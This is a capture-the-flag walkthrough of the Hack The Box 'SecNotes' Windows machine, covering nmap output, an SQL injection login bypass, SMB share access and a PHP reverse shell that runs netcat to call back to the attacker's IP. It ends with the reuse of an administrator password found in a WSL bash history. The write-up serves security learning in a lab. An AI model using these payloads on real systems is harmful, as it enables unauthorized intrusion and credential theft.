SecNotes

OS: Windows, Difficulty: Medium, IP: 10.10.10.97

Initial Enumeration

# Nmap 7.70 scan initiated Sun Jul 28 22:30:37 2019 as: nmap -sV -sC -O -A -oN O-Detailed -p 80,445,8808 10.10.10.97
Nmap scan report for 10.10.10.97
Host is up (0.41s latency).

PORT     STATE SERVICE      VERSION
80/tcp   open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
445/tcp  open  microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open  http         Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows XP|7 (86%)
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_7
Aggressive OS guesses: Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h13m10s, deviation: 4h02m31s, median: -6m51s
| smb-os-discovery: 
|   OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: SECNOTES
|   NetBIOS computer name: SECNOTES\x00
|   Workgroup: HTB\x00
|_  System time: 2019-07-28T09:54:12-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-07-28 22:24:14
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   243.88 ms 10.10.14.1
2   478.09 ms 10.10.10.97

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jul 28 22:31:41 2019 -- 1 IP address (1 host up) scanned in 65.43 seconds

Port 80

We'll execute 2 level SQL Injection on this website, with 1 on Registration and the other on Login with the following credentials.

Username: ' or '1'='1
Password: ' or '1'='1

This attack gets us credentials for the user Tyler. We'll use these to get into the SMB account of this user.

$ smbclient -U 'tyler' -L \\\\10.10.10.97
directory_create_or_exist: mkdir failed on directory /var/run/samba/msg.lock: Permission denied
Unable to initialize messaging context
Enter WORKGROUP\tyler password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        new-site        Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.97 failed (Error NT_STATUS_IO_TIMEOUT)
Failed to connect with SMB1 -- no workgroup available

$ smbclient -U 'tyler' \\\\10.10.10.97\\new-site
directory_create_or_exist: mkdir failed on directory /var/run/samba/msg.lock: Permission denied
Unable to initialize messaging context
Enter WORKGROUP\tyler password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Jul 29 16:38:28 2019
  ..                                  D        0  Mon Jul 29 16:38:28 2019
  iisstart.htm                        A      696  Thu Jun 21 20:56:03 2018
  iisstart.png                        A    98757  Thu Jun 21 20:56:03 2018
  Microsoft                           D        0  Mon Jul 29 15:17:39 2019

                12978687 blocks of size 4096. 8121274 blocks available
smb: \> 

As you can see, we have access to the other web-server found during the initial enumeration phase, running at port 8808

Now we'll upload a simple PHP reverse shell and netcat.exe onto the SMB share to get a reverse shell on the system.

Netcat - https://eternallybored.org/misc/netcat/

reverse-shell.php

<?php
system('nc64.exe -e cmd.exe 10.10.14.13 9999')
?>

User Own

C:\Users\tyler\Desktop>type user.txt
type user.txt
6fa75***

Root Own

C:\Users\tyler\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 9CDD-BADA

 Directory of C:\Users\tyler\Desktop

08/19/2018  03:51 PM    <DIR>          .
08/19/2018  03:51 PM    <DIR>          ..
06/22/2018  03:09 AM             1,293 bash.lnk
04/11/2018  04:34 PM             1,142 Command Prompt.lnk
04/11/2018  04:34 PM               407 File Explorer.lnk
06/21/2018  05:50 PM             1,417 Microsoft Edge.lnk
06/21/2018  09:17 AM             1,110 Notepad++.lnk
08/19/2018  09:25 AM                34 user.txt
08/19/2018  10:59 AM             2,494 Windows PowerShell.lnk
               7 File(s)          7,897 bytes
               2 Dir(s)  33,264,689,152 bytes free

Another thing to notice in the Desktop folder is a link to bash, this means we have WSL installed, let's go and explore that.

C:\Windows>dir /s /b | findstr bash.exe
dir /s /b | findstr bash.exe
C:\Windows\System32\bash.exe
C:\Windows\System32\en-US\bash.exe.mui
C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash.resources_31bf3856ad364e35_10.0.17134.1_en-us_982dd7ac5c23ee9a\bash.exe.mui
C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe

We have root on the WSL

C:\Windows>C:\Windows\System32\bash.exe
C:\Windows\System32\bash.exe
mesg: ttyname failed: Inappropriate ioctl for device
id
uid=0(root) gid=0(root) groups=0(root)

# ls -la /root
ls -la /root
total 8
drwx------ 1 root root  512 Jun 22  2018 .
drwxr-xr-x 1 root root  512 Jun 21  2018 ..
---------- 1 root root  398 Jun 22  2018 .bash_history
-rw-r--r-- 1 root root 3112 Jun 22  2018 .bashrc
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
drwxrwxrwx 1 root root  512 Jun 22  2018 filesystem

There's nothing in the root directory however, bash history has some interesting contents.

# cat .bash_history
cat .bash_history
cd /mnt/c/
ls
cd Users/
cd /
cd ~
ls
pwd
mkdir filesystem
mount //127.0.0.1/c$ filesystem/
sudo apt install cifs-utils
mount //127.0.0.1/c$ filesystem/
mount //127.0.0.1/c$ filesystem/ -o user=administrator
cat /proc/filesystems
sudo modprobe cifs
smbclient
apt install smbclient
smbclient
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
> .bash_history
less .bash_history
exit#

It has the connection string for the administrator account. Let's use that and connect via SMB.

$ smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\10.10.10.97\\c$
directory_create_or_exist: mkdir failed on directory /var/run/samba/msg.lock: Permission denied
Unable to initialize messaging context
Try "help" to get a list of possible commands.
smb: \> cd Users/Administrator/Desktop
smb: \Users\Administrator\Desktop\> dir
  .                                  DR        0  Sun Aug 19 22:31:17 2018
  ..                                 DR        0  Sun Aug 19 22:31:17 2018
  desktop.ini                       AHS      282  Sun Aug 19 22:31:17 2018
  Microsoft Edge.lnk                  A     1417  Sat Jun 23 05:15:06 2018
  root.txt                            A       34  Sun Aug 19 22:33:54 2018

                12978687 blocks of size 4096. 8121243 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Users\Administrator\Desktop\> 

$ cat root.txt 
7250c***

Learning Outcome

This box was mostly SMB focused, so had to do a lot of research to understand all the attacks that failed :P